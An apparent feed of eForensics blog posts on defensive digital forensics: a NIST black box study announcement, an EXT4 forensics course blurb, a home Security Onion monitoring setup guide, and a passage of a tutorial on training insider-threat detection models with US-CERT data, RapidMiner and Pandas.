  • Given the tools described in this course, like CyberChef, SilentEye, and others, you will be able to use and detect techniques on digital evidence found on a MacOS
  • All this will give you a much needed skill in computer forensics: how to deal with anti-forensics on a MacOS


The post CyberChef Walkthrough [FREE COURSE CONTENT] appeared first on eForensics.

NIST to Digital Forensics Experts: Show Us What You Got | From NIST


NIST to Digital Forensics Experts: Show Us What You Got

First large-scale “black box” study will test the accuracy of computer and mobile phone forensics.

In forensic science, researchers use black box studies to measure the reliability of methods that rely mainly on human judgment, as opposed to methods that rely on laboratory instruments. In digital forensics, experts turn data from digital devices into information that can help an investigation.

Digital forensics experts often extract data from computers and mobile phones that may contain evidence of a crime. Now, researchers at the National Institute of Standards and Technology (NIST) will conduct the first large-scale study to measure how well those experts do their job. But rather than testing the proficiency of individual experts, the study aims to measure the performance of the digital forensics community overall.

In this study, to be conducted online, participants will examine simulated digital evidence, then answer questions that might arise in a real criminal investigation. The exercise should take about two hours, and participation is voluntary. Enrollment is now open, and the online test will be available for approximately three months. 

“We want to understand the state of the practice,” said Barbara Guttman, leader of NIST’s digital forensics research program. “Can experts produce accurate and reliable information when examining data from a digital device?” 

In any forensic discipline, experts can encounter difficult cases. Fingerprints can be smudged and distorted. DNA can be degraded. One challenge with digital evidence is that it can often be difficult to find key bits of evidence among large volumes of data. Also, technology changes so quickly that it can be difficult to keep up.

“Forensics experts can’t extract data perfectly in every possible scenario,” Guttman said. “Phones change. Apps change. The world just moves too fast.”

While no forensic method works perfectly all the time, researchers can measure performance within a discipline by testing the experts. For instance, researchers might show fingerprint experts a series of prints and ask whether they do or don’t match. The study designers know the correct answers, and by combining the results from many experts, they can gain insight into the reliability of the method overall. 

These studies only determine whether the expert gave the correct answer, without concern for how they reached it. In other words, they treat the expert as a black box — something you cannot see inside. Researchers use black box studies to assess the reliability of methods that rely on human judgment. 

“We want to understand the state of the practice. Can experts produce accurate and reliable information when extracting data from a digital device?” —Barbara Guttman, leader of NIST’s digital forensics research program

For the NIST black box study, participants will download simulated evidence from the NIST website in the form of one virtual mobile phone and one virtual computer. Such virtual devices, called “forensic images,” are commonly used in digital forensics, and study participants will be able to connect to them using the same software tools they use when working on real cases.

The forensic images created for this study simulate imagined but realistic scenarios involving a potential homicide and a potential theft of intellectual property. Study participants will download the images, examine them using whatever forensic software tools they choose, and answer a series of questions. For instance:

  • What software program was used to discuss a potentially illegal transaction? 
  • What was the VIN number of the vehicle that connected to the phone via Bluetooth?  
  • What location information can be gleaned from the photo of a black Labrador found on this device?

The study is open to all public and private sector digital examiners who conduct hard drive or mobile phone examinations as part of their official duties. NIST will not calculate the performance of any specific expert or laboratory. Instead, NIST will publish anonymized and aggregated results that show the overall performance for the expert community and different sectors within that community. 

This study will fulfill a critical need identified in a landmark 2009 report by the National Academy of Sciences. Titled Strengthening Forensic Science in the United States: A Path Forward, that report called for black box studies to measure the reliability of forensic methods that rely on human judgment. Courts and jurors can then consider the results of those studies when weighing evidence. The results of this study will also provide strategic direction for future research.

This black box study is part of a larger effort to evaluate the scientific foundations of digital forensic methods. NIST is also conducting scientific foundation reviews for DNA mixtures, firearms identification and bitemark analysis. 

Original link: https://www.nist.gov/news-events/news/2020/06/nist-digital-forensics-experts-show-us-what-you-got

The post NIST to Digital Forensics Experts: Show Us What You Got | From NIST appeared first on eForensics.

EXT4 Layout [FREE COURSE CONTENT]


In this video from our EXT4 File System Forensics course by Divya Lakshmanan, you will learn all about the EXT4 layout. It's one of the first things you have to master if you plan on doing any file carving or advanced forensics on EXT4. Let's dive in! 



File System Forensics forms the root of any digital investigation process. Developing your skills in this area is sure to boost your confidence and propel you to navigate any investigation with ease. This course will make the esoteric nature of this topic coherent to a novice.

When I began exploring ext4 forensics, it piqued my curiosity. So much intricacy has gone into the development of the file system, leading to a number of forensic impacts. I conjured use cases and observed some interesting behaviour of the file system, which I would love to share with you. A lot of time is spent on processing information in bytes – which is definitely a drive down the road of patience! People usually shy away from data that is not intelligible to the average human. I will help you traverse through the world of bits and bytes in an enjoyable way. (Maybe we can communicate with aliens soon!)

The Linux operating system is ubiquitous today. From servers, to desktops, to laptops, to tablets, to smartphones – Linux is everywhere. Underlying all that intelligent engineering is a file system that facilitates the handling of files on those devices. It is the container in any data storage device that handles file arrangement meaningfully. It is analogous to a well stacked, alphabetically sorted bookshelf. File System Forensics is the study of the existential behaviour of files on a storage device – which may undergo addition, modification or removal. One can think of it as a psychological study of the data storage container.

This course primarily deals with forensics on ext4, that is commonly used in Linux machines all over the globe. Ext4 is also found in a lot of IoT devices and in smart home devices. In the untoward occurrence of a forensic incident involving any such devices, the skills you get from this course would help you process them looking for evidence. File System Forensics is a sought-after skill in many investigative agencies. Here is your chance to become a “Forensics Yoda”!

At the end of the course:

  • You will know how to perform file carving on EXT4, for data recovery or forensic purposes.
  • You will target specific bytes of data in the ext4 file system and interpret them to gain meaningful information
  • You will possess the finesse to tackle bytes (zeros and ones) fearlessly within the EXT4 layout
  • You will add another badge to your skillset. File System Forensics is a must-know topic for every skilled digital forensic investigator


The post EXT4 Layout [FREE COURSE CONTENT] appeared first on eForensics.

Setting up Security Onion at home | By Z3R0th


Setting up Security Onion at home

First off, what exactly is Security Onion and why do I care about this? From their website, it is described as: “Security Onion is a free and open source Linux distribution for intrusion detection, enterprise security monitoring, and log management. It includes Elasticsearch, Logstash, Kibana, Snort, Suricata, Bro, Wazuh, Sguil, Squert, CyberChef, NetworkMiner, and many other security tools. The easy-to-use Setup wizard allows you to build an army of distributed sensors for your enterprise in minutes!”

Sounds awesome right? And the best part of all of this is that it’s free!

There are a couple of different ways (that I know of) to set this up: use a spare computer that you don’t mind dedicating to becoming your Security Onion box, or use a system dedicated to being an ESXi server. Luckily for you, I’ve done both!

Before we get started, it is important that you have the capability to create a SPAN port on your local network. A SPAN port, for those that don’t know, is a port that is set up to mirror other ports on a switch. If you don’t have a switch and are looking to purchase one, here is what I’m currently using. You’re going to want a managed switch for this task.

Using the web console associated with the switch, I’m able to set up Port 8 as my SPAN port.

Another thing that you’ll need is at least two network interface cards (NICs) on your system. If you’re using an old computer just laying around that only has one, you can use USB NICs! When I had this set up on a spare laptop these are the ones I used.

Once you have these things you’re ready to start setting everything up! First, you have to decide which way you’re choosing to set this up.

A dedicated Security Onion computer is the easiest option, but not the most economical, since you lose an entire computer to one task.

Setting up ESXi is a little more daunting to most, but overall a simple process! You may be wondering, “but why can’t I set this up in Workstation Pro and virtualize it that way!?”. The simple answer is: you can, but you won’t be able to properly read traffic from across the network, because Workstation unfortunately does not let you properly create SPAN ports.

Dedicated Computer Solution

For a dedicated computer solution, you’re going to want to start by downloading the Security Onion ISO. Once this is complete, we flash the image to our HDD/SSD. I used Etcher to accomplish this.

Your device name will probably be different. Once everything is selected hit the Flash button

After this step is done we just need to install the drive back into our computer and power it on. If everything worked correctly you should be booting into Security Onion and you can begin the setup process.

ESXI Server Solution

Like the dedicated computer solution, first we need to change what our computer boots into. We’re going to boot into ESXi, which can be downloaded here. You’ll have to register for an account (it’s free) and then you can download an ISO. They’ll also give you a free license key! There are some limitations, but they more than likely won’t affect you. Unlike our dedicated computer installation, the ISO you download will be an installer. I would use a USB stick for this process, especially if you only have one HDD/SSD installed in the designated computer.

Once everything is installed for ESXi, we need to configure the settings needed for Security Onion. The first thing we need to do is add another virtual switch that allows port mirroring. Once logged in, on the left-hand panel click on <networking> and then <Virtual Switches>. There should be an option to add a standard virtual switch.

Here is our virtual switch which allows for promiscuous mode. This enables us to create a SPAN port.

Once our switch is created, we need to create a port group. This is done by clicking <networking> and then <port groups>. We add a new group and assign it to the virtual switch we created in the previous step.

Our port is assigned to the SPAN vswitch and specifically allows for promiscuous mode.

The next step is to upload our Security Onion ISO to the datastore. If we hit <storage> and <datastore browser>, we can see everything currently inside our datastore. If this is a fresh install, it should only contain a folder called “.sdd.sf”. So we’re going to create a new directory for our ISOs and upload our Security Onion ISO using the <upload> button within the datastore browser.

My datastore for ISOs and VMs

Once everything uploads, we’re ready to create our VM! If we hit <virtual machines> followed by <Create / Register VM>, we can define everything we want for our project. When you reach the screen where you define the VM’s settings, assign your second network adapter and specify a Datastore ISO file.

These exact settings aren’t needed. Just ensure your SPAN and Datastore ISO are selected

Setting up Security Onion

Now that we’ve got everything up to this point, the next step is to install the operating system. There should be an icon on the desktop that just needs to be double-clicked.

Once completed, we can begin our actual setup process. At this point, it’s important to know which interface is assigned to our SPAN port; I like to check MAC addresses to ensure everything is correct. We begin by hitting that Setup icon. Through a series of prompts, you will reach one that asks whether or not you want to configure your network interfaces. The answer is yes, and next it will ask which interface you would like to use as the management interface. This is NOT the interface plugged into our SPAN.

This interface will be used to hit the web console

The setup will then ask whether you’d like a static IP or one assigned via DHCP. The setup suggests a static IP, because that IP will always be reserved for this device, whereas with DHCP the IP can change depending on how the network is set up. We’ll set this up with a static IP of <192.168.1.125>, a netmask of <255.255.255.0> and a gateway of <192.168.1.1>. Your settings may differ based on your network; these are just settings that work with mine.
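
On a dedicated install, those wizard answers end up as ordinary Ubuntu network settings. Roughly, the resulting /etc/network/interfaces stanza would look like the fragment below (the interface name eth0 and the DNS server are assumptions here, not from the wizard's output):

```
# /etc/network/interfaces - sketch of what the setup wizard configures
auto eth0
iface eth0 inet static
    address 192.168.1.125
    netmask 255.255.255.0
    gateway 192.168.1.1
    dns-nameservers 192.168.1.1
```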

After this, we will enable our sniffing interface, the interface connected to our SPAN port. If you only have two NICs, there should only be one device left to choose. Once completed, we are prompted to restart our system, which we do. Following the restart, we can begin the second phase of the setup process: once again, we hit the Setup button.

Now we’re going to skip the network configuration

Since we’ve already completed the network configuration, we’re going to skip this task. For ease of use, we’re also going to choose <Evaluation Mode> instead of <Production Mode>; if you would like more granular control over your system, I would recommend <Production Mode>. Feel free to continue with the setup process until you create your user account. This will be the account used to access Kibana, Squert, and Sguil.

Feel free to create whatever username you wish

Once we confirm that these are the settings we want, the system will go about configuring everything for us. This process can take a bit of time, so feel free to grab a coffee or something. Now we’re good to go, right!? Sort of. We still need to allow access to our management network so we can reach it from outside the Security Onion machine.

We grant access by running the so-allow command

We see that there are a ton of different options to choose from, though the one we care about right now is option a. So we choose that and allow anything on our network to talk to the management interface.

At the end, we should have seen something like this

Now we are pretty much all set up. We can access our Kibana interface and see everything that is coming through our network now.

But wait! There’s more!

We can take this a step further and forward our Windows event logs to our Security Onion machine automagically! This can be done with a combination of Sysmon and Winlogbeat. We’re going to install both Sysmon and Winlogbeat on any/all Windows machines on our network that we wish to monitor.

Sysmon all the things

For our Sysmon setup, we’re going to go with the configuration by InfoSec Taylor Swift, via the resources on their GitHub. We just need to drop the sysmonconfig-export file into our Sysmon folder, like so. Here’s a great article on how to install Sysmon!

Here’s what your folder should look like

Winlogbeat for the win!

Now that we have Sysmon set up, we need to configure Winlogbeat to send our data off to our Security Onion. We can also add in different event logs to forward. Here is a sample of what the winlogbeat.yml should look like. You should be able to just copy and paste this over your existing file and be good to go. Here’s a great article on how to install Winlogbeat!
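
For reference, a minimal winlogbeat.yml along those lines might look like the fragment below. The exact event-log channels and the Beats port 5044 are assumptions (5044 is Logstash's conventional Beats listener); 192.168.1.125 is the management IP we configured earlier:

```yaml
winlogbeat.event_logs:
  - name: Application
  - name: Security
  - name: System
  - name: Microsoft-Windows-Sysmon/Operational   # Sysmon's channel

output.logstash:
  hosts: ["192.168.1.125:5044"]
```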

Last step!

Now we just need to head back to our Security Onion and run the <so-allow> command again! But we’re going to select option <b> to allow Logstash Beat through the firewall. It should look something like this.

Allowing Logstash Beat

Now, if everything is up and running properly, you should be able to monitor your home network using Security Onion. Hopefully you found this helpful!

Original link: https://medium.com/@Z3R0th/setting-up-security-onion-at-home-717340816b4e

The post Setting up Security Onion at home | By Z3R0th appeared first on eForensics.

Insider Threat Detection with AI Using Tensorflow and RapidMiner Studio | By Dennis Chow


Insider Threat Detection with AI Using Tensorflow and RapidMiner Studio

Summary

This technical article will teach you how to pre-process data, create your own neural networks, and train and evaluate models using the US-CERT's simulated insider threat dataset. The methods and solutions are designed for non-domain experts; particularly cyber security professionals. We will start our journey with the raw data provided by the dataset and provide examples of different pre-processing methods to get it "ready" for the AI solution to ingest. We will ultimately create models that can be re-used for additional predictions based on security events. Throughout the article, I will also point out the applicability and return on investment depending on your existing Information Security program in the enterprise.

Note: To use and replicate the pre-processed data and steps we use, prepare to spend 1-2 hours on this page. Stay with me and try not to fall asleep during the data pre-processing portion. What many tutorials don't state is that if you're starting from scratch, data pre-processing takes up to 90% of your time on projects like these.

At the end of this hybrid article and tutorial, you should be able to:

  • Pre-process the data provided from US-CERT into an AI solution ready format (Tensorflow in particular)
  • Use RapidMiner Studio and Tensorflow 2.0 + Keras to create and train a model using a pre-processed sample CSV dataset
  • Perform basic analysis of your data, chosen fields for AI evaluation, and understand the practicality for your organization using the methods described

Disclaimer

The author provides these methods, insights, and recommendations *as is* and makes no claim of warranty. Please do not use the models you create in this tutorial in a production environment without sufficient tuning and analysis before making them a part of your security program.

Tools Setup

If you wish to follow along and perform these activities yourself, please download and install the following tools from their respective locations:

Overview of the Process

It's important for newcomers to any data science discipline to know that the majority of your time will be spent on data pre-processing and analyzing what you have, which includes cleaning up the data, normalizing it, extracting any additional meta-insights, and then encoding it so that it is ready for an AI solution to ingest.

  1. We need to extract and process the dataset so that it is structured with the fields we may need as 'features', i.e. the fields to include in the AI model we create. We will need to ensure all the text strings are encoded into numbers so the engine we use can ingest them. We will also have to mark which rows are insider threats and which are not (true positives and true negatives).
  2. Next, after data pre-processing, we'll need to select, set up, and create the functions we will use to build the model and the neural network layers themselves.
  3. Generate the model; then examine its accuracy and applicability, and identify additional modifications or tuning needed in any part of the data pipeline.
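
Step 1's "encode text strings into numbers" can be as simple as mapping each distinct string to an integer code. A dependency-free sketch (the example column values are illustrative, not taken from the dataset):

```python
def encode_column(values):
    """Map each distinct string to an integer code, in first-seen order,
    so a text feature column becomes something a model can ingest."""
    codes = {}
    return [codes.setdefault(v, len(codes)) for v in values]

vectors = ["http", "email", "http", "device"]
encoded = encode_column(vectors)   # -> [0, 1, 0, 2]
```

Library equivalents (pandas category codes, scikit-learn's LabelEncoder) do the same job with extra conveniences; the point is only that every string feature must become numeric before training.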

Examining the Dataset Hands on and Manual Pre-Processing

Examining the raw US-CERT data requires you to download compressed files that must be extracted. Note just how large the sets are compared to how much we actually use after data pre-processing.

In our article, we saved a lot of time by going directly to answers.tar.bz2, which has the insiders.csv file for matching which datasets and individual extracted records are of value. It is worth stating that the index provided correlates record numbers in extended data, such as the file and psychometric-related data. We didn't use the extended metadata in this tutorial brief because of the extra time needed to correlate and consolidate all of it into a single CSV in our case.


To see a more comprehensive set of feature sets extracted from this same data, consider checking out this research paper called "Image-Based Feature Representation for Insider Threat Classification." We'll be referring to that paper later in the article when we examine our model accuracy.

Before getting the data encoded and ready for a function to read, we need to get the data extracted and categorized into the columns we need, including the one we want to predict. Let's use good old Excel to insert a column into the CSV. Prior to the screenshot, we added all the rows from the datasets referenced in "insiders.csv" for scenario 2.


The scenario (2) is described in scenarios.txt: "User begins surfing job websites and soliciting employment from a competitor. Before leaving the company, they use a thumb drive (at markedly higher rates than their previous activity) to steal data."

Examine our pre-processed data, including its intermediary and final forms, as shown below:


The photo above shows a snippet of the different record types, essentially appended to each other and sorted by date. Note that the different vectors (http vs. email vs. device) do not align easily and have different contexts in their columns. This is not optimal by any means, but since the insider threat scenario includes multiple event types, this is what we'll have to work with for now. This is the usual case with data you'll get when trying to correlate on time and multiple events tied to a specific attribute or user, like a SIEM does.

Mismatched column data above that we need to normalize

In the aggregation set, we combined the relevant CSVs after moving all of the items mentioned in insiders.csv for scenario 2 into the same folder. To formulate the 'true positive'-only portion of the dataset, we used PowerShell as shown below:


Right now we have a completely imbalanced dataset containing only true positives. We'll have to add true negatives, and the best approach is to have an equal number of record types, a 50/50 split with non-threat activity. This is almost never the case with security data, so we'll do what we can, as you'll see below. I also want to point out that if you're doing manual data processing in an OS shell, whatever you import into a variable sits in memory and does not get released or garbage collected by itself. As you can see from my PowerShell memory consumption after a bunch of data manipulation and CSV wrangling, my usage was up to 5.6 GB.
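As a rough Python equivalent of the PowerShell aggregation described above: stream every per-vector CSV in a folder into one combined file, keeping a single header row. The file and folder names here are hypothetical stand-ins, and streaming row by row also keeps memory flat rather than holding everything in a shell variable:

```python
import csv
import glob
import os
import tempfile

# Append every *.csv in a folder into one output file with a single header.
def concat_csvs(folder, out_path):
    wrote_header = False
    with open(out_path, "w", newline="") as out:
        writer = csv.writer(out)
        for path in sorted(glob.glob(os.path.join(folder, "*.csv"))):
            with open(path, newline="") as f:
                reader = csv.reader(f)
                header = next(reader)
                if not wrote_header:
                    writer.writerow(header)
                    wrote_header = True
                writer.writerows(reader)  # stream rows; nothing held in memory

# Toy demo: two small vector files stand in for the scenario 2 extracts.
folder = tempfile.mkdtemp()
for name, n in [("device.csv", 2), ("http.csv", 3)]:
    with open(os.path.join(folder, name), "w", newline="") as f:
        w = csv.writer(f)
        w.writerow(["id", "date", "user", "action"])
        for i in range(n):
            w.writerow([f"{name}-{i}", "01/02/2010 07:12:00", "ACME0001", "example"])

out_path = os.path.join(folder, "combined.agg")  # non-.csv name so glob skips it
concat_csvs(folder, out_path)
with open(out_path, newline="") as f:
    lines = f.read().splitlines()
print(len(lines))
```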


Let's look at the R1 dataset files. We'll need to pull records that we know are confirmed true negatives (non-threats) for each of the 3 types, matching the filenames we used in the true-positive extracts (again, the R1 dataset contains benign events).

We'll merge a number of records from all 3 of the R1 true negative data sets from logon, http, and device files. Note, that in the R1 true negative set, we did not find an emails CSV which adds to the imbalance for our aggregate data set.

Using PowerShell, we count the number of lines in each file. Since we had roughly 14K rows on the true-positive side, I arbitrarily took the first 4500 applicable rows from each true-negative file and appended them to the training dataset so that we have both true positives and true negatives mixed in. We'll have to add a column to mark which rows are an insider threat and which aren't.
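A hedged Python sketch of that counting-and-sampling step (the CSV content is made up, and the cutoff is 3 here instead of the article's 4500 so the toy data stays small):

```python
import csv
import io

# Count the rows in a true-negative file, then take only the first N rows.
def take_first_n(csv_text, n):
    reader = csv.reader(io.StringIO(csv_text))
    header = next(reader)
    return header, [row for _, row in zip(range(n), reader)]

# Toy stand-in for a logon.csv extract.
logon_csv = "id,date,user,pc,activity\n" + "\n".join(
    f"r{i},01/0{i + 1}/2010,ACME000{i},PC-{i},Logon" for i in range(5))

total_rows = sum(1 for _ in csv.reader(io.StringIO(logon_csv))) - 1  # minus header
header, sample = take_first_n(logon_csv, 3)
print(total_rows, len(sample))
```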


In pre-processing our data, we've already added all the records of interest and selected various other true-negative, non-threat records from the R1 dataset. Now we have our baseline of threats and non-threats concatenated in a single CSV. To the left, we've added a new column to denote true/false (1 or 0) via find and replace.


Above, you can also see we started changing true/false strings into numerical categories. This is the beginning of our path to encode the data through manual pre-processing, a hassle we could save ourselves, as we'll see in later steps, by using RapidMiner Studio and the Pandas DataFrame library in Python for Tensorflow. We just wanted to illustrate some of the steps and considerations you'll have to perform. Let's highlight what we can do using Excel functions before going the fully automated route.


We're also going to manually convert the date field into Unix epoch time for the sake of demonstration; as you can see, it becomes a large integer in a new column. To remove the old column in Excel for the rename, create a new sheet such as 'scratch' and cut the old (non-epoch) date values into that sheet. Reference that sheet along with the formula you see in the cell to achieve this effect. The formula is: "=(C2-DATE(1970,1,1))*86400" without quotes.
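The same conversion can be done programmatically. Here is a small Pandas sketch equivalent to that Excel formula, on a toy date column; the timestamp format string is an assumption, so adjust it to match your extract:

```python
import pandas as pd

# Convert date strings to Unix epoch seconds, like =(C2-DATE(1970,1,1))*86400.
df = pd.DataFrame({"date": ["01/02/2010 07:12:00", "01/02/2010 08:00:00"]})
df["date"] = (pd.to_datetime(df["date"], format="%m/%d/%Y %H:%M:%S")
              .astype("int64") // 10**9)   # nanoseconds since epoch -> seconds
print(df["date"].tolist())
```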


In our last manual pre-processing example, we 'categorize' the CSV by label encoding the data. You can automate this with one-hot encoding methods via a data dictionary in a script; in our case we show the manual method of mapping this in Excel, since we have a finite set of vectors in the records of interest (http is 0, email is 1, and device is 2).
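A Pandas sketch of that same finite mapping, which is how we'd automate the Excel find-and-replace step (the values are toy examples):

```python
import pandas as pd

# Manual label encoding of the finite 'vector' values, mirroring the mapping
# used in the article: http -> 0, email -> 1, device -> 2.
vector_map = {"http": 0, "email": 1, "device": 2}
df = pd.DataFrame({"vector": ["http", "device", "email", "http"]})
df["vector"] = df["vector"].map(vector_map)
print(df["vector"].tolist())   # [0, 2, 1, 0]
```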

You'll notice that we have not done the user, source, or action columns, as they have a very large number of unique values that need label encoding, and it's just impractical by hand. We were able to accomplish this without all the manual wrangling above using the 'turbo prep' feature of RapidMiner Studio, and likewise for the remaining columns via Python's Pandas in our script snippet below. Don't worry about this for now; we will showcase the steps in each AI tool and end up doing the same thing the easy way.

#print(pd.unique(dataframe['user']))
#https://pbpython.com/categorical-encoding.html
dataframe["user"] = dataframe["user"].astype('category')
dataframe["source"] = dataframe["source"].astype('category')
dataframe["action"] = dataframe["action"].astype('category')
dataframe["user_cat"] = dataframe["user"].cat.codes
dataframe["source_cat"] = dataframe["source"].cat.codes
dataframe["action_cat"] = dataframe["action"].cat.codes


#print(dataframe.info())
#print(dataframe.head())


#save dataframe with new columns for future data mapping
dataframe.to_csv('dataframe-export-allcolumns.csv')


#remove old columns
del dataframe["user"]
del dataframe["source"]
del dataframe["action"]
#restore original names of columns
dataframe.rename(columns={"user_cat": "user", "source_cat": "source", "action_cat": "action"}, inplace=True)

The snippet above is an example of using Python's Pandas library to manipulate and label encode the columns into numerical values unique to each string value in the original dataset. Try not to get caught up in this yet; we're going to show you the easy and comprehensive approach to all this data science work in RapidMiner Studio.

Important step for defenders: Given that we're using the pre-simulated, formatted dataset from US-CERT, not every SOC is going to have access to the same uniform data for their own security events. Many times your SOC will have only raw logs to export. From an ROI perspective, before pursuing your own DIY project like this, consider the level of effort; if you can automate exporting meta from your logs into a CSV format, an enterprise solution such as Splunk or another SIEM might be able to do this for you. You would have to correlate your events and add as many columns as possible for enriched data formatting. You would also have to examine how consistently you can automate exporting this data into a format like US-CERT's, so you can use similar pre-processing or ingestion methods. Make use of your SIEM's API features to export reports into a CSV format whenever possible.

Walking through RapidMiner Studio with our Dataset

It's time to use some GUI-based and streamlined approaches. The desktop edition of RapidMiner is Studio, and the latest editions as of 9.6.x have Turbo Prep and Auto Model built in as part of your workflows. Since we're not domain experts, we are definitely going to take advantage of them. Let's dig right in.

Note: If your trial expired before getting to this tutorial and you use the community edition, you will be limited to 10,000 rows. Further pre-processing is required to limit your datasets to 5K of true positives and 5K of true negatives, including the header. If applicable, use an educational license, which is unlimited and renewable each year you are enrolled at a qualifying institution with a .edu email.


Upon launching, we're going to start a new project and utilize the Turbo Prep feature. You can use other methods, or the manual way of selecting operators via the GUI in the bottom left for the community edition. However, we're going to use the enterprise trial because it's easy to walk through for first-time users.


We'll import our unprocessed aggregate CSV of true-positive-only data, remove the first-row headers, and use our own, because the original header row relates to the HTTP vector and does not apply to the USB device connection and email related records also in the dataset, as shown below.

Note: Unlike our pre-processing steps which includes label encodings and reduction, we did not do this yet on RapidMiner Studio to show the full extent of what we can easily do in the 'turbo prep' feature. We're going to enable the use of quotes as well and leave the other defaults for proper string escapes.


Next, we set our column header types to their appropriate data types.


Stepping through the wizard, we arrive at the Turbo Prep tab for review. It shows us the distribution and any errors, such as missing values that need to be adjusted, and which columns might be problematic. Let's start by making sure we identify all of these true positives as insider threats. Click on generate, and we're going to transform this dataset by inserting a new column in all the rows with a logical 'true' statement, like so:


We'll save the column details and export it for further processing later, or use it as a base template set for when we begin pre-processing for the Tensorflow method following this, to make things a little easier.


After the export as you can see above, don't forget we need to balance the data with true negatives. We'll repeat the same process of importing the true negatives. Now we should see multiple datasets in our turbo prep screen.


In the above, even though we've only imported 2 datasets, remember we transformed the true positives by adding a column called insiderthreat, which is a true/false boolean. We do the same with the true negatives, and you'll eventually end up with 4 of these listings.

We'll need to merge the true positives and true negatives into a 'training set' before we get to do anything fun with it. But first, we also need to drop columns that we don't think are relevant or useful, such as the transaction ID and the description column of scraped website keywords; none of the other row data have these, and they would contain a bunch of empty (null) values that aren't useful for calculating weights.


Important thought: As we've mentioned regarding other research papers, choosing columns for calculation, aka 'feature sets', that include complex strings requires tokenizing them using natural language processing (NLP). This adds to your pre-processing requirements in addition to label encoding; in the Tensorflow + Pandas Python method this would usually require wrangling multiple data frames and merging them on column keys for each record. While this is automated for you in RapidMiner, in Tensorflow you'll have to include this in your pre-processing script. More documentation about this can be found here.
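To make the tokenization idea concrete, here is a minimal bag-of-words sketch using only the standard library: each 'action' string becomes per-token counts rather than one opaque label. The action strings are invented examples, and a real pipeline would use a proper NLP library instead of this toy tokenizer:

```python
import re
from collections import Counter

# Invented 'action' strings standing in for the URL/device/email activity.
actions = [
    "http://jobhunt.example.com/resume upload",
    "device connect usb",
    "device disconnect usb",
]

def tokenize(text):
    # Lowercase and split on runs of letters/digits.
    return re.findall(r"[a-z0-9]+", text.lower())

# Vocabulary over all actions, then one count-vector per action string.
vocab = sorted({tok for a in actions for tok in tokenize(a)})
vectors = [[Counter(tokenize(a))[tok] for tok in vocab] for a in actions]
print(vocab)
```

Each row of `vectors` is now numeric input a model can weigh token by token, which is roughly what RapidMiner's text extraction did for us automatically.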

Take note that we did not do this in our datasets, because much later you'll see an optimized RapidMiner Studio recommendation showing that heavier weight and emphasis on the date and time were more efficient feature sets with less complexity. You, on the other hand, with different datasets and applications, may need NLP for sentiment analysis to add to the insider threat modeling.

Finishing your training set: Although we do not illustrate this, after you have imported both true negatives and true positives within the Turbo prep menu click on the "merge" button and select both transformed datasets and select the "Append" option since both have been pre-sorted by date.

Continue to the Auto Model feature

Within RapidMiner Studio we continue to the 'Auto Model' tab and utilize our selected aggregate 'training' data (remember training data includes true positives and true negatives) to predict on the insiderthreat column (true or false)


We also notice what our actual balance is. We are still imbalanced, with only 9,001 non-threat records vs. ~14K threats. That can always be padded with additional records should you choose. For now, we'll live with it and see what we can accomplish with not-so-perfect data.
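For reference, a quick Pandas sketch of checking the class balance and naively padding the minority class by resampling with replacement; the toy label counts stand in for the article's real split (~14K threats vs. 9,001 non-threats):

```python
import pandas as pd

# Toy labels: 14 threats (1) vs. 9 non-threats (0).
df = pd.DataFrame({"insiderthreat": [1] * 14 + [0] * 9})
counts = df["insiderthreat"].value_counts()

# Oversample the minority class up to the majority count.
minority = df[df["insiderthreat"] == counts.idxmin()]
pad = minority.sample(counts.max() - counts.min(), replace=True, random_state=0)
balanced = pd.concat([df, pad], ignore_index=True)
print(balanced["insiderthreat"].value_counts().to_dict())
```

Oversampling only duplicates rows, so adding genuinely new true-negative records, as we did from the R1 set, is the better fix when you have the data.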


Here the auto modeler recommends different feature columns in green and yellow and their respective correlation. The interesting thing is that it estimates date has high correlation but less stability than action and vector.

Important thought: As defenders, we would think the entire feature set applies in each column, as we've already reduced what we could in terms of relevance and complexity. It's also worth mentioning that this is based off a single event. Remember, insider threats often take multiple events, as we saw in the answers portion of insiders.csv. What the green indicators are showing us is unique single-event record identification.


We're going to use all the columns anyway, because we think they're all relevant. We also move to the next screen on model types, and because we're not domain experts we're going to try almost all of them, and we want the computer to re-run each model multiple times to find the optimized set of inputs and feature columns.

Remember that feature sets can include meta information based on insights from existing columns. We leave the default tokenization values, and we want to extract date and text information. Obviously, the items with free-form text are in the 'Action' column, with all the different URLs and event activity to which we want NLP applied. We also want to correlate between columns, rank the importance of columns, and explain predictions.


Note that in the above we've selected a bunch of heavy processing parameters for our batch job. On an 8-core processor running Windows 10, with 24 GB of memory, a value-series Radeon RX570 GPU, and SSDs, all of these models took about 6 hours to run in total with all the options set. After everything completed, we had 8000+ models and 2600+ feature set combinations tested in our screen comparison.


According to RapidMiner Studio, the deep learning neural network methods aren't the best ROI fit compared to the generalized linear model. There are no errors, though, and that's worrisome: it might mean that we have poor quality data or an overfit model. Let's take a look at deep learning, as it also claims a potential 100% accuracy, just to compare.


In the deep learning run above, 187 different combinations of feature sets were tested, and the optimized model differs from our own guesses as to which features would matter (mostly vector and action). We see even more weight put on interesting word tokens in Action and on the dates. Surprisingly, we did not see anything related to "email" or the word "device" in the actions as part of the optimized model.


Not to worry, as this doesn't mean we're dead wrong. It just means the feature sets it selected in its training (columns and extracted meta columns) produced fewer errors on the training set. This could mean that we don't have enough diverse or high quality data in our set. In the previous screen above you saw an orange circle and a translucent square.

The orange circle indicates the model's suggested optimizer function, and the square is our originally selected feature set. If you examine the scale, our human-selected feature set had an error rate between 0.9 and 1%, which puts our accuracy closer to the 99% mark, but only with a much more complex model (more layers and connections required in the neural net). That makes me feel a little better, and it goes to show that caution is needed when interpreting all of these at face value.

Tuning Considerations

Let's say you don't fully trust such a highly "100% accurate" model. We can try to re-run it using our feature sets in a vanilla manner, as pure token labels. We're *not* going to extract date information or apply text tokenization via NLP, and we don't want it to automatically create new feature set meta based on our original selections. Basically, we're going to use a plain vanilla set of columns for the calculations.


So in the above, let's re-run it looking at 3 different models, including the original best-fit model and the deep learning model with absolutely no optimization and no additional NLP applied. It's as if we used only encoded label values in the calculations and not much else.


In the above, we get even worse results: an error rate of 39%, i.e., 61% accuracy, across pretty much all the models. Our selection and lack of complexity without text token extraction is so reduced that even a more "primitive" Bayesian model (commonly used in basic email spam filter engines) seems to be just as accurate, with a fast compute time. This all looks bad, but let's dig a little deeper:


When we select the details of the deep learning model again, we see the accuracy climb in linear fashion as more of the training set population is discovered and validated against. From an interpretation standpoint, this shows us a few things:

  • Our original, primitive idea of feature sets, focusing on vector and action frequency using only unique encoded values, is only about as good as the toss-up probability of an analyst finding a threat in the data. On the surface, it appears we have at best a 10% gain in our chances of detecting an insider threat.
